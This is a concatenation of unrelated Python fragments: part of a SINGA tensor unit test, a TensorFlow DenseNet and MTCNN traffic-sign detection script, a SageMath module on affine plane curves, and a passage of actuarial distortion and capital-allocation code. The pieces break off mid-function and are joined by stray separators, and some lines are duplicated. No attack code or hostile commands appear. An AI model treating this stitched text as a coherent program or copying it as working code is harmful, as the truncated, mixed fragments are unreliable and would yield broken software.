def test_ceil_gpu(self):
self._ceil_helper(gpu_dev)
def _floor_helper(self, dev):
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np1 = np1 * 10
np2 = np.floor(np1)
t1 = tensor.Tensor(device=dev, data=np1)
t2_ct = singa_api.Floor(t1.data)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t2_ct)), np2)
def test_floor_cpu(self):
self._floor_helper(cpu_dev)
@unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
def test_floor_gpu(self):
self._floor_helper(gpu_dev)
def _as_type_helper(self, dev):
np1 = np.random.random([3]).astype(np.float32)
np1 = np1 * 10 - 5
np2 = np1.astype(np.int32)
np3 = np2.astype(np.float32)
t1 = tensor.Tensor(device=dev, data=np1)
t1 = tensor.Tensor(device=dev, data=np1)
t1_ct = t1.data
self.assertEqual(t1_ct.data_type(), singa_api.kFloat32)
t1_ct = t1_ct.AsType(singa_api.kInt)
self.assertEqual(t1_ct.data_type(), singa_api.kInt)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t1_ct)), np2)
t1_ct = t1_ct.AsType(singa_api.kFloat32)
self.assertEqual(t1_ct.data_type(), singa_api.kFloat32)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t1_ct)), np3)
def test_as_type_cpu(self):
self._as_type_helper(cpu_dev)
@unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
def test_as_type_gpu(self):
self._as_type_helper(gpu_dev)
def _as_type2_helper(self, dev):
shape1 = [1, 2, 3, 4]
shape2 = [4, 3, 2, 1]
np_int = np.random.randint(0, 10, shape1).astype(np.int32)
np_flt = np_int.astype(np.float32)
t1 = singa_api.Tensor(shape1, dev, singa_api.kInt)
t1.CopyIntDataFromHostPtr(np_int.flatten())
_ctensor_eq_ndarray(t1, np_int)
t1 = singa_api.Reshape(t1, shape2)
t2 = t1.AsType(singa_api.kFloat32)
_ctensor_eq_ndarray(t2, np_flt.reshape(shape2))
t3 = t2.AsType(singa_api.kInt)
_ctensor_eq_ndarray(t3, np_int.reshape(shape2))
t1 = singa_api.Reshape(t1, shape1)
t4 = t1.AsType(singa_api.kFloat32)
_ctensor_eq_ndarray(t4, np_flt.reshape(shape1))
def test_as_type2_cpu(self):
self._as_type2_helper(cpu_dev)
@unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
def test_as_type2_gpu(self):
self._as_type2_helper(gpu_dev)
@unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not | |
<reponame>wang-h-w/traffic-sign-detection<filename>EnvDetection/TSD_env_test.py<gh_stars>1-10
"""
Modified by: <NAME>, <NAME> and <NAME>
"""
import numpy as np
import cv2
import os
from core.model import P_Net, R_Net, O_Net
from core.detector import Detector
from core.fcn_detector import FcnDetector
from core.MtcnnDetector import MtcnnDetector
from datetime import timedelta
import tensorflow as tf
TF_VERSION = float('.'.join(tf.__version__.split('.')[:2]))
class DenseNet:
def __init__(self, growth_rate, depth,
total_blocks, keep_prob,
model_type, dataset='GTSRB',
reduction=1.0,
bc_mode=False,
):
self.data_shape = (48,48,3)
self.n_classes = 46
self.depth = depth
self.growth_rate = growth_rate
# how many features will be received after first convolution
# value the same as in the original Torch code
self.first_output_features = growth_rate * 2
self.total_blocks = total_blocks
self.layers_per_block = (depth - (total_blocks + 1)) // total_blocks
self.bc_mode = bc_mode
# compression rate at the transition layers
self.reduction = reduction
if not bc_mode:
print("Build %s model with %d blocks, "
"%d composite layers each." % (
model_type, self.total_blocks, self.layers_per_block))
if bc_mode:
self.layers_per_block = self.layers_per_block // 2
print("Build %s model with %d blocks, "
"%d bottleneck layers and %d composite layers each." % (
model_type, self.total_blocks, self.layers_per_block,
self.layers_per_block))
print("Reduction at transition layers: %.1f" % self.reduction)
self.keep_prob = keep_prob
self.model_type = model_type
self.dataset_name = dataset
self.batches_step = 0
self._define_inputs()
self._build_graph()
self._initialize_session()
def _initialize_session(self):
"""Initialize session, variables, saver"""
config = tf.ConfigProto()
# restrict model GPU memory utilization to min required
config.gpu_options.allow_growth = True
self.sess = tf.Session(config=config)
tf_ver = int(tf.__version__.split('.')[1])
if TF_VERSION <= 0.10:
self.sess.run(tf.initialize_all_variables())
else:
self.sess.run(tf.global_variables_initializer())
self.saver = tf.train.Saver()
@property
def save_path(self):
try:
save_path = self._save_path
except AttributeError:
save_path = 'saves/%s' % self.model_identifier
os.makedirs(save_path, exist_ok=True)
save_path = os.path.join(save_path, 'model.chkpt')
self._save_path = save_path
return save_path
@property
def model_identifier(self):
return "{}_growth_rate={}_depth={}_dataset_{}".format(
self.model_type, self.growth_rate, self.depth, self.dataset_name)
def save_model(self, global_step=None):
self.saver.save(self.sess, self.save_path, global_step=global_step)
def load_model(self):
try:
self.saver.restore(self.sess, self.save_path)
except Exception as e:
raise IOError("Failed to to load model "
"from save path: %s" % self.save_path)
#self.saver.restore(self.sess, self.save_path)
print("Successfully load model from save path: %s" % self.save_path)
def log_loss_accuracy(self, loss, accuracy, epoch, prefix,
should_print=True):
if should_print:
print("mean cross_entropy: %f, mean accuracy: %f" % (
loss, accuracy))
summary = tf.Summary(value=[
tf.Summary.Value(
tag='loss_%s' % prefix, simple_value=float(loss)),
tf.Summary.Value(
tag='accuracy_%s' % prefix, simple_value=float(accuracy))
])
self.summary_writer.add_summary(summary, epoch)
def _define_inputs(self):
shape = [None]
shape.extend(self.data_shape)
self.images = tf.placeholder(
tf.float32,
shape=shape,
name='input_images')
self.labels = tf.placeholder(
tf.float32,
shape=[None, self.n_classes],
name='labels')
self.learning_rate = tf.placeholder(
tf.float32,
shape=[],
name='learning_rate')
self.is_training = tf.placeholder(tf.bool, shape=[])
def composite_function(self, _input, out_features, kernel_size=3):
"""Function from paper H_l that performs:
- batch normalization
- ReLU nonlinearity
- convolution with required kernel
- dropout, if required
"""
with tf.variable_scope("composite_function"):
# BN
output = self.batch_norm(_input)
# ReLU
output = tf.nn.relu(output)
# convolution
output = self.conv2d(
output, out_features=out_features, kernel_size=kernel_size)
# dropout(in case of training and in case it is no 1.0)
output = self.dropout(output)
return output
def bottleneck(self, _input, out_features):
with tf.variable_scope("bottleneck"):
output = self.batch_norm(_input)
output = tf.nn.relu(output)
inter_features = out_features * 4
output = self.conv2d(
output, out_features=inter_features, kernel_size=1,
padding='VALID')
output = self.dropout(output)
return output
def add_internal_layer(self, _input, growth_rate):
"""Perform H_l composite function for the layer and after concatenate
input with output from composite function.
"""
# call composite function with 3x3 kernel
if not self.bc_mode:
comp_out = self.composite_function(
_input, out_features=growth_rate, kernel_size=3)
elif self.bc_mode:
bottleneck_out = self.bottleneck(_input, out_features=growth_rate)
comp_out = self.composite_function(
bottleneck_out, out_features=growth_rate, kernel_size=3)
# concatenate _input with out from composite function
if TF_VERSION >= 1.0:
output = tf.concat(axis=3, values=(_input, comp_out))
else:
output = tf.concat(3, (_input, comp_out))
return output
def add_block(self, _input, growth_rate, layers_per_block):
"""Add N H_l internal layers"""
output = _input
for layer in range(layers_per_block):
with tf.variable_scope("layer_%d" % layer):
output = self.add_internal_layer(output, growth_rate)
return output
def transition_layer(self, _input):
"""Call H_l composite function with 1x1 kernel and after average
pooling
"""
# call composite function with 1x1 kernel
out_features = int(int(_input.get_shape()[-1]) * self.reduction)
output = self.composite_function(
_input, out_features=out_features, kernel_size=1)
# run average pooling
output = self.avg_pool(output, k=2)
return output
def trainsition_layer_to_classes(self, _input):
"""This is last transition to get probabilities by classes. It perform:
- batch normalization
- ReLU nonlinearity
- wide average pooling
- FC layer multiplication
"""
# BN
output = self.batch_norm(_input)
# ReLU
output = tf.nn.relu(output)
# average pooling
last_pool_kernel = int(output.get_shape()[-2])
output = self.avg_pool(output, k=last_pool_kernel)
# FC
features_total = int(output.get_shape()[-1])
output = tf.reshape(output, [-1, features_total])
W = self.weight_variable_xavier(
[features_total, self.n_classes], name='W')
bias = self.bias_variable([self.n_classes])
logits = tf.matmul(output, W) + bias
return logits
def conv2d(self, _input, out_features, kernel_size,
strides=[1, 1, 1, 1], padding='SAME'):
in_features = int(_input.get_shape()[-1])
kernel = self.weight_variable_msra(
[kernel_size, kernel_size, in_features, out_features],
name='kernel')
output = tf.nn.conv2d(_input, kernel, strides, padding)
return output
def avg_pool(self, _input, k):
ksize = [1, k, k, 1]
strides = [1, k, k, 1]
padding = 'VALID'
output = tf.nn.avg_pool(_input, ksize, strides, padding)
return output
def batch_norm(self, _input):
output = tf.contrib.layers.batch_norm(
_input, scale=True, is_training=self.is_training,
updates_collections=None)
return output
def dropout(self, _input):
if self.keep_prob < 1:
output = tf.cond(
self.is_training,
lambda: tf.nn.dropout(_input, self.keep_prob),
lambda: _input
)
else:
output = _input
return output
def weight_variable_msra(self, shape, name):
return tf.get_variable(
name=name,
shape=shape,
initializer=tf.contrib.layers.variance_scaling_initializer())
def weight_variable_xavier(self, shape, name):
return tf.get_variable(
name,
shape=shape,
initializer=tf.contrib.layers.xavier_initializer())
def bias_variable(self, shape, name='bias'):
initial = tf.constant(0.0, shape=shape)
return tf.get_variable(name, initializer=initial)
def _build_graph(self):
growth_rate = self.growth_rate
layers_per_block = self.layers_per_block
# first - initial 3 x 3 conv to first_output_features
with tf.variable_scope("Initial_convolution"):
output = self.conv2d(
self.images,
out_features=self.first_output_features,
kernel_size=3)
# add N required blocks
for block in range(self.total_blocks):
with tf.variable_scope("Block_%d" % block):
output = self.add_block(output, growth_rate, layers_per_block)
# last block exist without transition layer
if block != self.total_blocks - 1:
with tf.variable_scope("Transition_after_block_%d" % block):
output = self.transition_layer(output)
with tf.variable_scope("Transition_to_classes"):
logits = self.trainsition_layer_to_classes(output)
prediction = tf.nn.softmax(logits)
#print(prediction.shape)
self.prediction_out = tf.argmax(prediction, 1)
def test(self, data):
#print(data.shape)
feed_dict = {
self.images: data,
self.is_training: False,
}
#fetches = [self.cross_entropy, self.accuracy]
out = self.sess.run(self.prediction_out, feed_dict=feed_dict)
#print(out.shape,out)
return out
#return mean_loss, mean_accuracy
def _measure_mean_and_std(images):
# for every channel in image
means = []
stds = []
# for every channel in image (assume this is last dimension)
for ch in range(images.shape[-1]):
means.append(np.mean(images[:, :, :, ch]))
stds.append(np.std(images[:, :, :, ch]))
return means,stds
def normalize_images(images):
images = images.astype('float64')
# for every channel in image(assume this is last dimension)
images_means ,images_stds = _measure_mean_and_std(images)
for i in range(images.shape[-1]):
images[:, :, :, i] = ((images[:, :, :, i] - images_means[i]) / images_stds[i])
return images
def visssss(img, dets2, pred, collect, images_ori, thresh=0.998):
img_handle = img.copy()
img_save = img.copy()
idx = 1 # show on image
categroy_dict = {}
class2name = {'i2': 'Non-motorized road', 'i4': 'Motor vehicle road', 'i5': 'Drive on the right side of the road',
'il100': 'minimum speed limit 100km/h', 'il60': 'minimum speed limit 100km/h',
'il80': 'minimum speed limit 100km/h',
'io': 'unknown', 'ip': 'crosswalk', 'p10': 'no motor vehicles', 'p11': 'no honking', 'p12': 'no motorbike',
'p19': 'no right turn', 'p23': 'no left turn', 'p26': 'no trucks', 'p27': 'no motor vehicles',
'p3': 'no large passenger cars', 'p5': 'no U-turn', 'p6': 'no non-motorized vehicles',
'pg': 'slow down and yield', 'ph4': 'maximum height 4 meters', 'ph4.5': 'maximum height 4.5 meters',
'ph5': 'maximum height 4.5 meters', 'pl100': 'speed limit 100km/h', 'pl120': 'speed limit 120km/h',
'pl20': 'speed limit 20km/h', 'pl30': 'speed limit 30km/h', 'pl40': 'speed limit 40km/h',
'pl5': 'speed limit 5km/h', 'pl50': 'speed limit 50km/h', 'pl60': 'speed limit 60km/h',
'pl70': 'speed limit 70km/h',
'pl80': 'speed limit 80km/h', 'pm20': 'weight limit 20t', 'pm30': 'weight limit 20t',
'pm55': 'weight limit 55t',
'pn': 'no Parking', 'pne': 'no entry', 'po': 'unknown', 'pr40': 'lift speed limit', 'w13': 'crossroads',
'w32': 'under construction', 'w55': 'watch out for children', 'w57': 'watch out for pedestrians',
'w59': 'pay attention to confluence', 'wo': 'unknown'}
select_res = []
for i in range(dets2.shape[0]):
bbox = dets2[i, :4].astype('int32')
score = dets2[i, 4]
if score > thresh and pred[i] < 45:
clas = pred[i]
signname = class2name[collect[clas]]
categroy_dict[idx] = signname
select_res.append(images_ori[i])
cv2.rectangle(img_handle, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (0, 255, 0), 2)
cv2.putText(img_handle, str(idx), (bbox[0]-3, bbox[1]-5), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,255,0), 2)
cv2.rectangle(img_save, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (0, 255, 0), 2)
cv2.putText(img_save, signname, (bbox[0]-3, bbox[1]-5), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,255,0), 2)
idx = idx + 1
return img_handle, img_save, categroy_dict, select_res
def detectOneImg(prefix, epoch, batch_size, model, img, collect, test_mode="onet",
thresh=[0.6, 0.6, 0.7], min_face_size=24,
stride=2, slide_window=False, shuffle=False, vis=False):
detectors = [None, None, None]
#load densenet for classfication
tf.reset_default_graph()
model.load_model()
model_path = ['%s-%s'%(x,y) for x,y in zip(prefix, epoch)] # meta图、data变量数据、index键值关系、checkpoint信息
| |
"""
Affine plane curves over a general ring
AUTHORS:
- <NAME> (2005-11-13)
- <NAME> (2005-11-13)
- <NAME> (2006-01)
"""
#*****************************************************************************
# Copyright (C) 2005 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.interfaces.all import singular
from sage.misc.all import add
from sage.rings.all import degree_lowest_rational_function
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.schemes.affine.affine_space import is_AffineSpace
from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_subscheme_affine
from curve import Curve_generic
class AffineSpaceCurve_generic(Curve_generic, AlgebraicScheme_subscheme_affine):
def _repr_type(self):
return "Affine Space"
def __init__(self, A, X):
if not is_AffineSpace(A):
raise TypeError, "A (=%s) must be an affine space"%A
Curve_generic.__init__(self, A, X)
d = self.dimension()
if d != 1:
raise ValueError, "defining equations (=%s) define a scheme of dimension %s != 1"%(X,d)
class AffineCurve_generic(Curve_generic):
def __init__(self, A, f):
P = f.parent()
if not (is_AffineSpace(A) and A.dimension != 2):
raise TypeError, "Argument A (= %s) must be an affine plane."%A
Curve_generic.__init__(self, A, [f])
def _repr_type(self):
return "Affine"
def divisor_of_function(self, r):
"""
Return the divisor of a function on a curve.
INPUT: r is a rational function on X
OUTPUT:
- ``list`` - The divisor of r represented as a list of
coefficients and points. (TODO: This will change to a more
structural output in the future.)
EXAMPLES::
sage: F = GF(5)
sage: P2 = AffineSpace(2, F, names = 'xy')
sage: R = P2.coordinate_ring()
sage: x, y = R.gens()
sage: f = y^2 - x^9 - x
sage: C = Curve(f)
sage: K = FractionField(R)
sage: r = 1/x
sage: C.divisor_of_function(r) # todo: not implemented (broken)
[[-1, (0, 0, 1)]]
sage: r = 1/x^3
sage: C.divisor_of_function(r) # todo: not implemented (broken)
[[-3, (0, 0, 1)]]
"""
F = self.base_ring()
f = self.defining_polynomial()
pts = self.places_on_curve()
numpts = len(pts)
R = f.parent()
x,y = R.gens()
R0 = PolynomialRing(F,3,names = [str(x),str(y),"t"])
vars0 = R0.gens()
t = vars0[2]
divf = []
for pt0 in pts:
if pt0[2] != F(0):
lcs = self.local_coordinates(pt0,5)
yt = lcs[1]
xt = lcs[0]
ldg = degree_lowest_rational_function(r(xt,yt),t)
if ldg[0] != 0:
divf.append([ldg[0],pt0])
return divf
def local_coordinates(self, pt, n):
r"""
Return local coordinates to precision n at the given point.
Behaviour is flaky - some choices of `n` are worst that
others.
INPUT:
- ``pt`` - an F-rational point on X which is not a
point of ramification for the projection (x,y) - x.
- ``n`` - the number of terms desired
OUTPUT: x = x0 + t y = y0 + power series in t
EXAMPLES::
sage: F = GF(5)
sage: pt = (2,3)
sage: R = PolynomialRing(F,2, names = ['x','y'])
sage: x,y = R.gens()
sage: f = y^2-x^9-x
sage: C = Curve(f)
sage: C.local_coordinates(pt, 9)
[t + 2, -2*t^12 - 2*t^11 + 2*t^9 + t^8 - 2*t^7 - 2*t^6 - 2*t^4 + t^3 - 2*t^2 - 2]
"""
f = self.defining_polynomial()
R = f.parent()
F = self.base_ring()
p = F.characteristic()
x0 = F(pt[0])
y0 = F(pt[1])
astr = ["a"+str(i) for i in range(1,2*n)]
x,y = R.gens()
R0 = PolynomialRing(F,2*n+2,names = [str(x),str(y),"t"]+astr)
vars0 = R0.gens()
t = vars0[2]
yt = y0*t**0+add([vars0[i]*t**(i-2) for i in range(3,2*n+2)])
xt = x0+t
ft = f(xt,yt)
S = singular
S.eval('ring s = '+str(p)+','+str(R0.gens())+',lp;')
S.eval('poly f = '+str(ft) + ';')
c = S('coeffs(%s, t)'%ft)
N = int(c.size())
b = ["%s[%s,1],"%(c.name(), i) for i in range(2,N/2-4)]
b = ''.join(b)
b = b[:len(b)-1] # to cut off the trailing comma
cmd = 'ideal I = '+b
S.eval(cmd)
S.eval('short=0') # print using *'s and ^'s.
c = S.eval('slimgb(I)')
d = c.split("=")
d = d[1:]
d[len(d)-1] += "\n"
e = [x[:x.index("\n")] for x in d]
vals = []
for x in e:
for y in vars0:
if str(y) in x:
if len(x.replace(str(y),"")) != 0:
i = x.find("-")
if i>0:
vals.append([eval(x[1:i]),x[:i],F(eval(x[i+1:]))])
i = x.find("+")
if i>0:
vals.append([eval(x[1:i]),x[:i],-F(eval(x[i+1:]))])
else:
vals.append([eval(str(y)[1:]),str(y),F(0)])
vals.sort()
k = len(vals)
v = [x0+t,y0+add([vals[i][2]*t**(i+1) for i in range(k)])]
return v
def plot(self, *args, **kwds):
"""
Plot the real points on this affine plane curve.
INPUT:
- ``self`` - an affine plane curve
- ``*args`` - optional tuples (variable, minimum, maximum) for
plotting dimensions
- ``**kwds`` - optional keyword arguments passed on to
``implicit_plot``
EXAMPLES:
A cuspidal curve::
sage: R.<x, y> = QQ[]
sage: C = Curve(x^3 - y^2)
sage: C.plot()
A 5-nodal curve of degree 11. This example also illustrates
some of the optional arguments::
sage: R.<x, y> = ZZ[]
sage: C = Curve(32*x^2 - 2097152*y^11 + 1441792*y^9 - 360448*y^7 + 39424*y^5 - 1760*y^3 + 22*y - 1)
sage: C.plot((x, -1, 1), (y, -1, 1), plot_points=400)
A line over `\mathbf{RR}`::
sage: R.<x, y> = RR[]
sage: C = Curve(R(y - sqrt(2)*x))
sage: C.plot()
"""
I = self.defining_ideal()
return I.plot(*args, **kwds)
class AffineCurve_finite_field(AffineCurve_generic):
def rational_points(self, algorithm="enum"):
r"""
Return sorted list of all rational points on this curve.
Use *very* naive point enumeration to find all rational points on
this curve over a finite field.
EXAMPLE::
sage: A, (x,y) = AffineSpace(2,GF(9,'a')).objgens()
sage: C = Curve(x^2 + y^2 - 1)
sage: C
Affine Curve over Finite Field in a of size 3^2 defined by x0^2 + x1^2 - 1
sage: C.rational_points()
[(0, 1), (0, 2), (1, 0), (2, 0), (a + 1, a + 1), (a + 1, 2*a + 2), (2*a + 2, a + 1), (2*a + 2, 2*a + 2)]
"""
f = self.defining_polynomial()
R = f.parent()
K = R.base_ring()
points = []
for x in K:
for y in K:
if f(x,y) == 0:
points.append(self((x,y)))
points.sort()
return points
class AffineCurve_prime_finite_field(AffineCurve_finite_field):
# CHECK WHAT ASSUMPTIONS ARE MADE REGARDING AFFINE VS. PROJECTIVE MODELS!!!
# THIS IS VERY DIRTY STILL -- NO DATASTRUCTURES FOR DIVISORS.
def riemann_roch_basis(self,D):
"""
Interfaces with Singular's BrillNoether command.
INPUT:
- ``self`` - a plane curve defined by a polynomial eqn f(x,y)
= 0 over a prime finite field F = GF(p) in 2 variables x,y
representing a curve X: f(x,y) = 0 having n F-rational
points (see the Sage function places_on_curve)
- ``D`` - an n-tuple of integers
`(d1, ..., dn)` representing the divisor
`Div = d1*P1+...+dn*Pn`, where
`X(F) = \{P1,...,Pn\}`.
*The ordering is that dictated by places_on_curve.*
OUTPUT: basis of L(Div)
EXAMPLE::
sage: R = PolynomialRing(GF(5),2,names = ["x","y"])
sage: x, y = R.gens()
sage: f = y^2 - x^9 - x
sage: C = Curve(f)
sage: D = [6,0,0,0,0,0]
sage: C.riemann_roch_basis(D)
[1, (y^2*z^4 - x*z^5)/x^6, (y^2*z^5 - x*z^6)/x^7, (y^2*z^6 - x*z^7)/x^8]
"""
f = self.defining_polynomial()
R = f.parent()
F = self.base_ring()
p = F.characteristic()
Dstr = str(tuple(D))
G = singular(','.join([str(x) for x in D]), type='intvec')
singular.LIB('brnoeth.lib')
S = singular.ring(p, R.gens(), 'lp')
fsing = singular(str(f))
X = fsing.Adj_div()
P = singular.NSplaces(1, X)
T = P[1][2]
T.set_ring()
LG = G.BrillNoether(P)
dim = len(LG)
basis = [(LG[i][1], LG[i][2]) for i in range(1,dim+1)]
x, y, z = PolynomialRing(F, 3, names = ["x","y","z"]).gens()
V = []
for g in basis:
T.set_ring() # necessary...
V.append(eval(g[0].sage_polystring())/eval(g[1].sage_polystring()))
return V
def rational_points(self, algorithm="enum"):
r"""
Return sorted list of all rational points on this curve.
INPUT:
- ``algorithm`` - string:
+ ``'enum'`` - straightforward enumeration
+ ``'bn'`` - via Singular's Brill-Noether package.
+ ``'all'`` - use all implemented algorithms and
verify that they give the same answer, then return it
.. note::
The Brill-Noether package does not always work. When it
fails a RuntimeError exception is raised.
EXAMPLE::
sage: x, y = (GF(5)['x,y']).gens()
sage: f = y^2 - x^9 - x
sage: C = Curve(f); C
Affine Curve over Finite Field of size 5 defined by -x^9 + y^2 - x
sage: C.rational_points(algorithm='bn')
[(0, 0), (2, 2), (2, 3), (3, 1), (3, 4)]
sage: C = Curve(x - y + 1)
sage: C.rational_points()
[(0, 1), (1, 2), (2, 3), (3, 4), (4, 0)]
We compare Brill-Noether and enumeration::
sage: x, y = (GF(17)['x,y']).gens()
sage: C = Curve(x^2 + y^5 + x*y - 19)
sage: v = C.rational_points(algorithm='bn')
sage: w = C.rational_points(algorithm='enum')
sage: len(v)
20
sage: v == w
True
"""
if algorithm == "enum":
return AffineCurve_finite_field.rational_points(self, algorithm="enum")
elif algorithm == "bn":
f = self.defining_polynomial()._singular_()
singular | |
* 3 + 5
# bit = np.cumsum(test['y'][::-1])
# test['z'] = bit
# test['w'] = bit / test.a
# test
#
# df[f'exag_{line}'] = exleaUC + exixgtaUC * self.density_df.loss + mass
# df[f'exag1_{line}'] = exleaUC1 + exixgtaUC * self.density_df.loss + mass
# is this ever used?
# df[f'exleag_{line}'] = exleaUC / df.gF
# df[f'exleag1_{line}'] = exleaUC1 / df.gF
#
# again, exi_xgtag is super important, so we will compute it bare bones the same way as exi_xgta
# df[f'exi_xgtag_{line}'] = exixgtaUC / df.gS
#
#
# df['exi_xgtag_' + line] = ((df[f'exeqa_{line}'] / df.loss *
# df.gp_total).shift(-1)[::-1].cumsum()) / df.gp_total.shift(-1)[::-1].cumsum()
# exa uses S in the denominator...and actually checking values there is a difference between the sum and gS
#
# May 2020 new treatment of masses
#
mass = ημ_mass = total_mass = 0.
if dist.mass:
# this is John's problem: the last scenario is getting all the weight...
# total_mass is is the "shortfall" in gp_total - it is added at the end; it is not necessary if the
# distribution is actually bounded - then you already pick up the mass
# only need to add masses up to this point - an issue for bounded variables
# mass = total_mass * self.density_df[f'exi_xeqa_{line}'].iloc[idx_ess_sup]
if np.allclose(1.0, df.gp_total.sum()):
logger.info('gp_total sums to 1, mass accounted for in gp_total; no further adjustment needed')
else:
mass = dist.mass * mass_hints[line]
ημ_mass = dist.mass * (np.sum(mass_hints) - mass_hints[line])
total_mass = dist.mass
logger.info(f'sum(gp_total)={df.gp_total.sum():.5g} < 1, setting {line} mass = {mass}')
# original
# df['exi_xgtag_' + line] = ((df[f'exeqa_{line}'] / df.loss *
# df.gp_total).shift(-1)[::-1].cumsum()) / df.gS
# df['exi_xgtag_ημ_' + line] = ((df[f'exeqa_ημ_{line}'] / df.loss *
# df.gp_total).shift(-1)[::-1].cumsum()) / df.gS
# Nov 2020
# shift[-1] because result is for > a, so the first entry sums from bucket 1...
# need the denominator to equal the numerator sum of p values
# the shift up needs to be filled in with the last S value (for the tail) otherwise that probability
# is lost...hence we need to set fill_values:
last_gS = df.gS.iloc[-1]
last_x = df[f'exeqa_{line}'].iloc[-1] / df.loss.iloc[-1] * last_gS
logger.debug(f'Tail adjustment for {line}: {last_x:.6g}')
df['exi_xgtag_' + line] = \
((df[f'exeqa_{line}'] / df.loss * df.gp_total).
shift(-1, fill_value=last_x)[::-1].cumsum() + mass) / (df.gS + total_mass)
# need these to be zero so nan's do not propagate
df.loc[gSeq0, 'exi_xgtag_' + line] = 0.
if not efficient:
last_x = df[f'exeqa_ημ_{line}'].iloc[-1] / df.loss.iloc[-1] * last_gS
df['exi_xgtag_ημ_' + line] = \
((df[f'exeqa_ημ_{line}'] / df.loss * df.gp_total).
shift(-1, fill_value=last_x)[::-1].cumsum() + ημ_mass) / (df.gS + total_mass)
df.loc[gSeq0, 'exi_xgtag_ημ_' + line] = 0.
#
#
# following the Audit Vignette this is the way to go:
# in fact, need to shift both down because cumint (prev just gS, but int beta g...integrands on same
# basis
# df[f'exag_{line}'] = (df[f'exi_xgtag_{line}'].shift(1) * df.gS.shift(1)).cumsum() * self.bs
# df[f'exag_ημ_{line}'] = (df[f'exi_xgtag_ημ_{line}'].shift(1) * df.gS.shift(1)).cumsum() * self.bs
# np.allclose(
# (df[f'exi_xgtag_{line}'].shift(1, fill_value=0) * df.gS.shift(1, fill_value=0)).cumsum() * self.bs,
# (df[f'exi_xgtag_{line}'] * df.gS).shift(1, fill_value=0).cumsum() * self.bs)
# Doh
df[f'exag_{line}'] = (df[f'exi_xgtag_{line}'] * df.gS).shift(1, fill_value=0).cumsum() * self.bs
if not efficient:
df[f'exag_ημ_{line}'] = (df[f'exi_xgtag_ημ_{line}'] * df.gS).shift(1, fill_value=0).cumsum() * self.bs
# maybe sometime you want this unchecked item?
# df[f'exleag_1{line}'] = np.cumsum( df[f'exeqa_{line}'] * df.p_total )
# it makes a difference NOT to divivde by df.gS but to compute the actual weights you are using (you mess
# around with the last weight)
#
#
#
# these are all here for debugging...see
# C:\S\TELOS\spectral_risk_measures_monograph\spreadsheets\[AS_IJW_example.xlsx]
# df[f'exag1_{line}'] = exleaUC + exixgtaUC1 * self.density_df.loss + mass
# df[f'exi_xgtag1_{line}'] = exixgtaUC1 / df.gS
# df[f'exleaUC_{line}'] = exleaUC
# df[f'exleaUCcs_{line}'] = exleaUCcs
# df[f'U_{line}'] = exixgtaUC
# df[f'U1_{line}'] = exixgtaUC1
# df[f'RAW_{line}'] = self.density_df.loc[::-1, f'exeqa_{line}'] / self.density_df.loc[::-1, 'loss'] * \
# df.loc[::-1, 'gp_total']
if efficient:
# need to get to T.M and T.Q for pricing... laser in on those...
# duplicated and edited code from below
df['exag_total'] = df.gS.shift(1, fill_value=0).cumsum() * self.bs
df['M.M_total'] = (df.gS - df.S)
df['M.Q_total'] = (1 - df.gS)
# hummmm.aliases, but...?
# df['M.L_total'] = df['S']
# df['M.P_total'] = df['gS']
# df['T.L_total'] = df['exa_total']
# df['T.P_total'] = df['exag_total']
# critical insight is the layer ROEs are the same for all lines by law invariance
# lhopital's rule estimate of g'(1) = ROE(1)
# this could blow up...
ϵ = 1e-10
gprime1 = (g(1 - ϵ) - (1 - ϵ)) / (1 - g(1 - ϵ))
df['M.ROE_total'] = np.where(df['M.Q_total']!=0,
df['M.M_total'] / df['M.Q_total'],
gprime1)
# where is the ROE zero? need to handle separately else Q will blow up
roe_zero = (df['M.ROE_total'] == 0.0)
# print(f"g'(0)={gprime1:.5f}\nroe zero vector {roe_zero}")
for line in self.line_names_ex:
report_time(f'apply_distortion - starting {line} efficient loop')
df[f'T.M_{line}'] = df[f'exag_{line}'] - df[f'exa_{line}']
mm_l = df[f'T.M_{line}'].diff().shift(-1) / self.bs
# careful about where ROE==0
mq_l = mm_l / df['M.ROE_total']
mq_l.iloc[-1] = 0
mq_l.loc[roe_zero] = np.nan
df[f'T.Q_{line}'] = mq_l.shift(1).cumsum() * self.bs
df.loc[0, f'T.Q_{line}'] = 0
if create_augmented:
self.augmented_df = df
return Answer(augmented_df=df)
# sum of parts: careful not to include the total twice!
# not used
# df['exag_sumparts'] = df.filter(regex='^exag_[^η]').sum(axis=1)
# LEV under distortion g
# originally
# df['exag_total'] = self.cumintegral(df['gS'])
# revised cumintegral does: v.shift(1, fill_value=0).cumsum() * bs
df['exag_total'] = df.gS.shift(1, fill_value=0).cumsum() * self.bs
# df.loc[0, 'exag_total'] = 0
# comparison of total and sum of parts
# Dec 2019 added info to compute the total margin and capital allocation by layer
# [MT].[L LR Q P M]_line: marginal or total (ground-up) loss, loss ratio etc.
# do NOT divide MARGINAL versions by bs because they are per 1 wide layer
# df['lookslikemmtotalxx'] = (df.gS - df.S)
df['M.M_total'] = (df.gS - df.S)
df['M.Q_total'] = (1 - df.gS)
# hummmm.aliases, but...?
df['M.L_total'] = df['S']
df['M.P_total'] = df['gS']
# df['T.L_total'] = df['exa_total']
# df['T.P_total'] = df['exag_total']
# critical insight is the layer ROEs are the same for all lines by law invariance
# lhopital's rule estimate of g'(1) = ROE(1)
# this could blow up... TODO extend Distortion class to return gprime1
ϵ = 1e-10
gprime1 = (g(1 - ϵ) - (1 - ϵ)) / (1 - g(1 - ϵ))
df['M.ROE_total'] = np.where(df['M.Q_total']!=0,
